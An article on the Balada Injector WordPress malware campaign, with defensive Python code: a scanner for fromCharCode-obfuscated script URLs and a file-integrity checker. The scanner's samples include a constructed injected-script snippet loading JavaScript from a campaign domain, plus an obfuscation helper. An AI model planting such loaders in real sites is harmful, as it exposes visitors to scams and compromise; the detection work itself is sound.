A long-running malware campaign targeting WordPress websites, tracked as Balada Injector, is estimated to have compromised up to one million websites since its first waves in 2017.
Sucuri has reported that the Balada Injector campaign operates in waves, with a new wave roughly once a month. Each wave uses a freshly registered domain name, so blocklists and signatures built from the previous wave do not catch the next one.
Over the years, Balada Injector has used more than 100 domains and a range of methods to exploit known vulnerabilities in themes and plugins, including HTML injection and Site URL injection. A recurring goal is to read the database credentials stored in wp-config.php, which give the attackers direct access to the site's database even after the vulnerable plugin has been patched.
Most of these domain names are combinations of two to four English words that make no sense together, for example:-
- sometimesfree[.]biz
- destinyfernandi[.]com
- travelfornamewalking[.]ga
- statisticline[.]com
The injected scripts are loaded from URLs on various subdomains of the current wave's domain, such as:-
- java.sometimesfree[.]biz/counter.js – active 2017
- slow.destinyfernandi[.]com/slow.js – active 2020
- main.travelfornamewalking[.]ga/stat.js – active 2021
- cdn.statisticline[.]com/scripts/sway.js – active 2023
The injected code, which is obfuscated with String.fromCharCode so that the script URL does not appear in plain text, redirects visitors to scam pages that disguise a push-notification prompt as a CAPTCHA check; once a visitor clicks "Allow", the browser delivers misleading content and ads through notifications.
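As an added example (not Sucuri's tooling or code from the campaign), the following Python scanner applies the two observations above to site content: it expands String.fromCharCode(...) calls to see what they really build, extracts the hosts of any absolute or protocol-relative script URLs, and flags a chunk when a host belongs to a known wave domain or when a URL only becomes visible after de-obfuscation. The domain list is the sample from this article and must be kept current; the three inputs are constructed to match the URL patterns described, not captured from a real site. The same scan_text() call can be run over wp_options values (siteurl, widget text) exported from the database, which is where Site URL injections live.

```python
import re
from typing import Dict, Set

# Wave domains named in the article. Sample only: every new wave registers a
# fresh domain, so this set is never complete and must be kept up to date.
KNOWN_WAVE_DOMAINS: Set[str] = {
    "sometimesfree.biz",
    "destinyfernandi.com",
    "travelfornamewalking.ga",
    "statisticline.com",
}

# String.fromCharCode(104, 105, ...) with a plain list of decimal char codes.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9\s,]+)\)")
# Host part of an absolute (https://host/...) or protocol-relative (//host/...) URL.
URL_HOST_RE = re.compile(r"""(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})(?=["'/\s>;)]|$)""", re.I)


def to_fromcharcode(s: str) -> str:
    """Produce the obfuscated form the campaign uses; used here only to build a sample."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


def decode_fromcharcode(text: str, max_rounds: int = 5) -> str:
    """Replace every String.fromCharCode(...) call with the string it evaluates to.
    Repeats a few rounds so a decoded payload that itself contains a call is expanded too."""
    def _expand(m) -> str:
        return "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip())

    for _ in range(max_rounds):
        new_text = FROMCHARCODE_RE.sub(_expand, text)
        if new_text == text:
            break
        text = new_text
    return text


def registrable_domain(host: str) -> str:
    """'cdn.statisticline.com' -> 'statisticline.com' (last two labels; fine for these TLDs)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def scan_text(text: str, known: Set[str] = KNOWN_WAVE_DOMAINS) -> Dict[str, object]:
    """Scan a chunk of HTML/JS/PHP, or a wp_options value, for Balada-style injections."""
    visible_hosts = {h.lower() for h in URL_HOST_RE.findall(text)}
    decoded = decode_fromcharcode(text)
    all_hosts = {h.lower() for h in URL_HOST_RE.findall(decoded)}
    hidden_hosts = all_hosts - visible_hosts           # only reachable after de-obfuscation
    known_hits = {h for h in all_hosts if registrable_domain(h) in known}
    return {
        "obfuscated": decoded != text,
        "external_hosts": sorted(all_hosts),
        "hidden_hosts": sorted(hidden_hosts),
        "known_wave_hosts": sorted(known_hits),
        # A known wave domain, or any URL that only appears after decoding, is a hit:
        # legitimate code has no reason to hide a script source behind char codes.
        "suspicious": bool(known_hits) or bool(hidden_hosts),
    }


def scan_file(path: str) -> Dict[str, object]:
    with open(path, "r", encoding="utf-8", errors="ignore") as f:
        return scan_text(f.read())


# Constructed samples modelled on the article's URL patterns (not captured from a real site).
SAMPLE_INJECTED = (
    "<script>var s=document.createElement('script');"
    "s.src=" + to_fromcharcode("//main.travelfornamewalking.ga/stat.js") + ";"
    "document.head.appendChild(s);</script>"
)
SAMPLE_PLAIN = '<script src="https://cdn.statisticline.com/scripts/sway.js"></script>'
SAMPLE_BENIGN = '<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>'

if __name__ == "__main__":
    for name, sample in [("injected", SAMPLE_INJECTED), ("plain", SAMPLE_PLAIN), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_text(sample))
```

The hidden-host check is the part worth keeping even when the domain list is stale: a new wave domain will not be in the list, but the obfuscation pattern that hides it is the same from wave to wave.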
Recommendations
The recommendations below are the baseline measures Sucuri's analysts advise for every WordPress site:-
- Keep WordPress core and all installed plugins updated.
- Keep installed themes updated as well, including inactive ones.
- Use strong, unique passwords for every account.
- Enable two-factor authentication for all administrator accounts.
- Deploy file integrity monitoring so that modified or newly added files are detected.
- Take regular backups of the website and its database.
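As an added example of the file integrity recommendation (not Sucuri's or WordPress's own tooling), the following Python module builds a SHA-256 manifest of a site's code files, diffs it against a stored baseline, and pulls out the changes that should be looked at first for a campaign like this one: any PHP file written under wp-content/uploads, which should hold media and never code, and any edit to wp-config.php or .htaccess. The two manifests at the bottom are constructed to stand in for a clean baseline and a later scan; the file names and hashes in them are illustrative only.

```python
import hashlib
import os
from typing import Dict, Iterable, List


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str, exts: Iterable[str] = (".php", ".js", ".html")) -> Dict[str, str]:
    """Map each code file under root (path relative to root) to its SHA-256.
    .htaccess is always included: injected rewrite rules are a common persistence trick."""
    manifest: Dict[str, str] = {}
    suffixes = tuple(exts)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == ".htaccess" or name.endswith(suffixes):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def high_priority(diff: Dict[str, List[str]]) -> List[str]:
    """Changes to triage first: PHP under wp-content/uploads (media only, never code)
    and any change to wp-config.php or .htaccess."""
    watch = {"wp-config.php", ".htaccess"}
    out = set()
    for p in diff["added"] + diff["modified"]:
        if p.startswith("wp-content/uploads/") and p.endswith(".php"):
            out.add(p)
        elif os.path.basename(p) in watch:
            out.add(p)
    return sorted(out)


# Constructed manifests: a clean baseline and a later scan of the same site.
# Hashes are placeholders; a real manifest comes from build_manifest(site_root).
BASELINE = {
    "index.php": "a" * 64,
    "wp-config.php": "b" * 64,
    ".htaccess": "c" * 64,
    "wp-content/themes/twentytwentythree/functions.php": "d" * 64,
}
AFTER = {
    "index.php": "a" * 64,
    "wp-config.php": "b" * 64,
    ".htaccess": "e" * 64,                                          # rewrite rules changed
    "wp-content/themes/twentytwentythree/functions.php": "f" * 64,  # theme file modified
    "wp-content/uploads/2023/04/.cache.php": "9" * 64,              # new PHP file in uploads
}

if __name__ == "__main__":
    changes = diff_manifests(BASELINE, AFTER)
    print(changes)
    print("look first:", high_priority(changes))
```

Store the baseline manifest off the web server (a compromised site can rewrite a manifest kept next to the files it describes), regenerate it only after a deliberate update, and run the diff from a cron job so that the monthly waves this campaign runs in are caught within hours rather than at the next manual review.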